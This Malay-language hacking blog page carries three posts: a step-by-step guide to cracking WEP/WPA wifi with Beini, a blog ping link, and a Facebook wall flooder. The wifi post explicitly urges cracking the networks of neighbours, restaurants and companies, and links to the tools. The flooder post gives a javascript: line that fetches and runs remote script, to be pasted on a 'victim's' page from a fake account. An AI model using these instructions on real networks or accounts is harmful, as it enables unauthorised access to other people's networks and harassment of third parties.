There was an error in this gadget

Hack Wifi for WEP and WPA (Beini 1.2.2)


ok..entri aku sebelum ni cuma ajar untuk menggodam Wifi untuk security WEP je kan..kali ni aku nak tunjukkan macam mana nak godam kedua-dua (WEP/WPA/WPA2) terus menggunakan Beini 1.2.2 jugak..senang jak lahh..
tak perlu sedia panadol activ5 pun..

tengok entri sebelum ni cara nak boot guna CD ROM atau USB BOOT..
malas nak cerita panjang laa..
download jak tutorial kat bawah ni..

klik disini untuk download ebook > http://www.mediafire.com/?2r6kfad9flha403
P/S - *Link under construction, TQ for inform.

Ping Device Untuk Blog



okehhh..korang nak ping laman blog korang kan? sekarang aku nak bagi korang link untuk ping tanpa perlu sekatan atau captcha yang memedihkan/membutakan/membengkakkan mata..cukup la tuhh..auta dah...
klik je link kat bawah ni :

klik di sini > Ping Device

Contoh Gambar  ^

Antara laman-laman ping tersebut menghantar link anda..

Senarai engin carian : Weblogs.com, Blo.gs, Technorati, Feed Burner, Syndic8, NewsGator, My Yahoo!, PubSub.com, Blogdigger, BlogRolling, BlogStreet, Moreover, Weblogalot, Icerocket, News Is Free, Topic Exchange, Google Blog Search ,Spinn3r, Bloglines, AideRSS, SkyGrid, Bitacoras, Collecta, Audio.Weblogs, RubHub, GeoURL, A2B GeoLocation, BlogShares.

Flood Wall Facebook Seseorang

Assalamualaikum.. disini aku ingin berkongsi satu cara mudah untuk membanjiri dinding orang² lain.. cara ini diajarkan oleh kawan aku sendiri menggunakan hanya dengan kod javascript yang mudah. ini hanyalah untuk pembelajaran dan sebarang kegiatan yang memudaratkan akan ditanggung sendiri oleh pengguna.

1. Login ke akaun facebook anda (kalau boleh fake id la)

2. Copy script ni


javascript:(a = (b = document).createElement("script")).src = "http://flooder.googlecode.com/files/FBWF.js", b.body.appendChild(a); void(0)


3. pergi ke page mangsa anda.. kemudian paste je dekat kotak url anda. enter.






4. akan keluar satu kotak yang meminta amount untuk flood





5. kotak seterusnya untuk perkataan yang ingin disebutkan





6. Setelah tekan ok, tunggu selama beberapa saat dan muat semula laman tersebut.. hasilnya akan menjadi seperti ini..





7. Selamat mencuba.


P/S: Only works on Google Chrome..


Credit to = GXT

Hack Wifi (Beini 1.2.2)



ok....yahhh..nak hack wifi jiran korang? restoran starbuck? senang ajerr..satu syarat, cuma wifi jenis security WEP jak bleh..

1. Mula2 tgok korang punya network adapter wireless (untuk laptop) @ brand/chipset external usb wireless smada bleh suport or tak..klu x bleh xde rzeki la tuhh..
http://www.mediafire.com/?cpna5u77domrwac


2. Download Beini ni kat link yg dah aku sedia kn tuk korg..
http://www.mediafire.com/?fi8ipa6i12fih19


3. Lepas download Beini tu, pastikn ekk dlm format iso..klu format rar korang kena extract dlu ok..

4. Cara nak run Beini tu korang msti burn iso tu as image kat cd (pakai nero, ashampoo, ultraiso n lain2) untuk boot menggunakan cd la..

5. Klu nak boot gna usb(pendrive), korang guna software kat link yg aku bg ni..
http://www.mediafire.com/?coa1mn3cdjabak2


dan ni link tutorial cara nak boot Beini kat dlm pendrive
http://www.mediafire.com/?7354r7yhiz4argj


AKU SARANKAN KORANG PRINT OUT STEP NI LPAS KORANG BACA SBB NAK GUNA BILA NAK HACK TPI KLU OTAK KORANG JENIS MUDAH INGAT ABAIKAN OK..;)

6. Ok lpas dah download smua ni n dah burn dlm cd or usb kita truskn ngan projek kta hack wifi kwn,jiran,restoran2 berdekatan,syarikat2 n yg lain2 ok...

7. -Mula2 msukkan cd boot td or usb(pendrive yg dah boot pakai UNETbootin 377) ke laptop anda n restart kan laptop korng..

8. -Bila dah runing software tu, korang enter jak kat tulisan DEFAULT..

9. -Bila dah masuk program tu, korang click ikon ke-5 (lambang botol susu) pastu click yes..

10. -Click kotak wlan0, lepas tu klik next dan click scan..

11. -Lepas scan, dia akan tunjukkan smua nama2 wifi yg ada dskitar anda yg nak dhack tu la dlm msa 30 saat..

12. -Click wireless mana yang nak hack dan dia akan highlight sendiri lepas tu klik next..

13. -click advanced mode..

14. -Click capture, lepas tu klik fake auth (by force)

15. -Click access to information, klik start. tunggu sampai dia tulis Connected to 5c:d9:88:b5:80:93(contoh jak). lepas tu klik X untuk kotak fake authentication with AP (maksudnya tutup kotak tu)

16. -Tick kotak Auto Run. klik Interactive 0841 (-2). tgk kotak kat kiri atas, tgk bahagian Beacons, tunggu sampai 1,000 + lebih. lepas tu klik kotak Previous (All Stop!)..

17. -Click advance mode..

18. -Click capture. klik fake auth (by force)..

19. -Click access to information, klik start. tunggu sampai dia tulis Connected to(mcm step ke-15 diatas). kali nie tak payah tutup kotak nie yah..

20. -Click Interactive 0841 (-2). tgk kotak kat kiri atas, tgk bahagian Data, tunggu sampai 10,000 + lebih. lepas tu klik kotak start crack..

21. -Kalau dia keluar tulisan failed, korang boleh tunggu dia akan run sendiri atau korang boleh klik stop crack, lepas tu klik start crack sekali lagi..

22. -Kalau berjaya dia akan tulis key found. angka dalam key found (............) tu la password wifi tu tapi korang kena ambil angka jak yah, yang tanda titik bertindih mcm ni -> : korang abaikan.

23. -Lepas dah dpat password tu korang bleh la on kan laptop korang tpi remove kan cd n usb tu dlu klu tak dia jd boot lg tu nt k..

24. Bila dah on laptop,korang buka wifi korang n cari nama wifi yg korang hack tdi n click connect n masukkn pasword yg dah di hack tu..

settle..klu ad pape nk tnye leave je comment kt bawah ni ok..nnti ak feedback smula...selamat mencuba